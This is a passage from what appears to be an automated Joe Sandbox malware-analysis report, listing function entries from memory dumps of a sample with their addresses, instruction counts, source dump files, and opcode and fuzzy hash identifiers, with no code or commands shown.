                                                                                                                                                                          • Opcode ID: db93e550327f7076d0798ccbe5d5e2fdc1a3d258c1b369b513a62b7dac7c4dfd
                                                                                                                                                                          • Instruction ID: 0a5f54f77391bcf094106221c60126113d80e7f3aaa11f21d31bb7671d66dfd7
                                                                                                                                                                          • Opcode Fuzzy Hash: db93e550327f7076d0798ccbe5d5e2fdc1a3d258c1b369b513a62b7dac7c4dfd
                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0683254F2C99FE7228FB088615E97FA4AF43714B1501F6D496CB1A2C52D1606C791
                                                                                                                                                                          Function 00007FFD9BF89DD0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9e4d1859b1c72221cc95a8e0240c9c452fca64a667f59b9958fda43f54511d69
                                                                                                                                                                          • Instruction ID: 49d11de9e39f5c802537f8382ce9ce1c66f467b4b9bb8024252b08970b00f800
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e4d1859b1c72221cc95a8e0240c9c452fca64a667f59b9958fda43f54511d69
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0A420B58E0D4AEA74EF248060A7663E1AF54300B414679944FC35E2CE39F905C380
                                                                                                                                                                          Function 00007FFD9BBC32D2 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d17c0701b866d7a3ea3664db37003ceedaf640f439655b4914fd8fb7c818a138
                                                                                                                                                                          • Instruction ID: cd2c2e201d7d2064416ddbce28b284583b14b1f9e62c4619f33165b7d44114f4
                                                                                                                                                                          • Opcode Fuzzy Hash: d17c0701b866d7a3ea3664db37003ceedaf640f439655b4914fd8fb7c818a138
                                                                                                                                                                          • Instruction Fuzzy Hash: 03F0963145E2C99FD313DBB088225A53FB4BF43218B1A00E7E045CB0F2C96C1716C762
                                                                                                                                                                          Function 00007FFD9BBCBE72 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a77d8249ea6fa16970d3d8f0238be69a9e56748066fb1e5c9e16e2a42576bb52
                                                                                                                                                                          • Instruction ID: b66f3581e46fd8ffc41f8b21e2880c5731c8525076d47f4c8a9747f1a9d803c8
                                                                                                                                                                          • Opcode Fuzzy Hash: a77d8249ea6fa16970d3d8f0238be69a9e56748066fb1e5c9e16e2a42576bb52
                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0963144E3CE9FD322DBB088355AA3FB4AF43204B1A01E6E445C70F2C62D1716C762
                                                                                                                                                                          Function 00007FFD9BF880A4 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4b695182397e176a6c78887c80eeab8a3925a8a692159f5ea12bbff10003e3f7
                                                                                                                                                                          • Instruction ID: e3c93adadf34ae3606f2793a291ccb2a47e9e790a731801a74524b3484837a97
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b695182397e176a6c78887c80eeab8a3925a8a692159f5ea12bbff10003e3f7
                                                                                                                                                                          • Instruction Fuzzy Hash: F201C271B09A5D8EDBADDF5884A1B64B7B1FB55300F0501FAD44ED3292CA356A848B06
                                                                                                                                                                          Function 00007FFD9BBC4AEE Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fc4bf5255de5df01f7b663b14b12ddc4ec467b294bfdc6ea020e595adf364107
                                                                                                                                                                          • Instruction ID: 56c8172177cd796a4ad6084c9bcfbfe9446708bcf61109ddbe5ef6ea2c5379a8
                                                                                                                                                                          • Opcode Fuzzy Hash: fc4bf5255de5df01f7b663b14b12ddc4ec467b294bfdc6ea020e595adf364107
                                                                                                                                                                          • Instruction Fuzzy Hash: D5F03A30305A0A8FEB28DA5CC4B47B633D1FB99304F15857DD81AC3AF1DAA9AA90C740
                                                                                                                                                                          Function 00007FFD9BBCD67E Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d805a2666e91a9749dd6f8a8b9839c6ba55f058f918f9cd4bcfd60669c7d53e
                                                                                                                                                                          • Instruction ID: df33d078f5aceb9877f1754a8c175bc2e535b6d88d7aad984de2d7041949c538
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d805a2666e91a9749dd6f8a8b9839c6ba55f058f918f9cd4bcfd60669c7d53e
                                                                                                                                                                          • Instruction Fuzzy Hash: CCF03A34315A0A4FE728EA5CC4B47B633D1FB99308F15457AD85AC3AE1DA69A990C740
                                                                                                                                                                          Function 00007FFD9BF8215E Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 61e4067ed0ed79e2b3313832ad95171b59c662b6aa8640ecbf60fc75006507da
                                                                                                                                                                          • Instruction ID: ec46d1373118b388b6e9bf9ed64838b6f2f6b07eb509870374764b244cfc51b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 61e4067ed0ed79e2b3313832ad95171b59c662b6aa8640ecbf60fc75006507da
                                                                                                                                                                          • Instruction Fuzzy Hash: C7F09A3035590A4BFB29DA98C4B57A633D1EB99300F11813AD80BD3AE0DA79A9908740
                                                                                                                                                                          Function 00007FFD9BBC1DDA Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f57ad23aa7c5ed9ca265e427d6b88d3a22d60363ac228ed85f7e5235e7942656
                                                                                                                                                                          • Instruction ID: 9df4bcbd350483ce6927ae5cd3764ede86778c97842ddedbf9c10d45dab0585d
                                                                                                                                                                          • Opcode Fuzzy Hash: f57ad23aa7c5ed9ca265e427d6b88d3a22d60363ac228ed85f7e5235e7942656
                                                                                                                                                                          • Instruction Fuzzy Hash: 92E02230A0A20DCFDB24EF28C4406E53BA1FF44300F000039F40883194CBB5D6A0C7C0
                                                                                                                                                                          Function 00007FFD9BBCD658 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ab49367eb1bad02473ea74f19bd386b630a3e735f6e483f1c8759986834560c
                                                                                                                                                                          • Instruction ID: cfbd1a86f2e30042673a29ba3f9956ab742335dc46eaaae96a753eadbda62680
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ab49367eb1bad02473ea74f19bd386b630a3e735f6e483f1c8759986834560c
                                                                                                                                                                          • Instruction Fuzzy Hash: 69E01288B1F90F8AFA39A5AC853127915817F42308F63053AC40F825E6CC29BA02D256
                                                                                                                                                                          Function 00007FFD9BBCCB62 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 753c1348950873bcc1e9da0ed355b8522a41c4b296738dd953f688357ac7242f
                                                                                                                                                                          • Instruction ID: 841d92ffa7457ec9576e71f22c52311e402c59aaf8561dfa74b631f682ff6865
                                                                                                                                                                          • Opcode Fuzzy Hash: 753c1348950873bcc1e9da0ed355b8522a41c4b296738dd953f688357ac7242f
                                                                                                                                                                          • Instruction Fuzzy Hash: C1E0D842E0E3CA4FE76296F848700B81BE0AF2326470602B2C419892D3E94C1985C751
                                                                                                                                                                          Function 00007FFD9BF81657 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a77ca3857a975bd0d93a6b7b1ec6515da41b9de48ff07bca3996ad30a74f800b
                                                                                                                                                                          • Instruction ID: 22352be635660019e3e8fb79050bb3861ad891999e8e25179d8cd320301bf07e
                                                                                                                                                                          • Opcode Fuzzy Hash: a77ca3857a975bd0d93a6b7b1ec6515da41b9de48ff07bca3996ad30a74f800b
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD01D41F4E6894BE7360AB4047517819949F1B38075A07B6D197491F3D9592A059711
                                                                                                                                                                          Function 00007FFD9BBC4ACB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7a4da925f387e1e342f5f6690e79ac1fabfe0c16eb6d7ca9cd3efe1488ce2fc4
                                                                                                                                                                          • Instruction ID: b720a1f04a93b361fdd9110430b2261856bc1a4eef9f18ab0f654d71e606d13a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a4da925f387e1e342f5f6690e79ac1fabfe0c16eb6d7ca9cd3efe1488ce2fc4
                                                                                                                                                                          • Instruction Fuzzy Hash: 86D0C918B0F91F89F138E78A423023B1194BF00308E26443EE16F818F6CD5D7711E206
                                                                                                                                                                          Function 00007FFD9BF8213B Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a6dfca640fd1ff0a6acf096221b1ed235d4b352246173aef4cb6ad8510bf9eb6
                                                                                                                                                                          • Instruction ID: de4ebc80d7f05c2f1e4c69823e852e14bc03fa6379f8716ddbc7022cbafd5d68
                                                                                                                                                                          • Opcode Fuzzy Hash: a6dfca640fd1ff0a6acf096221b1ed235d4b352246173aef4cb6ad8510bf9eb6
                                                                                                                                                                          • Instruction Fuzzy Hash: 12D09254B8FE0F85F93A5ED18AB123951956F01700E66427AD19F51AF1893ABB026202
                                                                                                                                                                          Function 00007FFD9BBC3FDF Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3087623037.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bbc0000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                          • Instruction ID: 7d190b18fa4f23ce2d379728542db092ca6099861653697f1caf5819ab2b0125
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf915828a75e0efd7b8144b9721b7d66fc471cc94de40a60ab237b1d94b0bfb
                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C80F0E3875AE63162E808A207C06902B662457960575D546851E3D85C6A069255
                                                                                                                                                                          Function 00007FFD9BF89143 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.3110033988.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7ffd9bf80000_ZWgKQlTqcrSB.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                          • Instruction ID: 0d109ca4a409cb612531bec065999ce285cacde773b9f389c4fe26e9700b01cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                                                                                                                                          • Instruction Fuzzy Hash: 76B09200F8EE0B52E63418E008AC03C00410B48340A165B30A20F452E2DC7A2A106150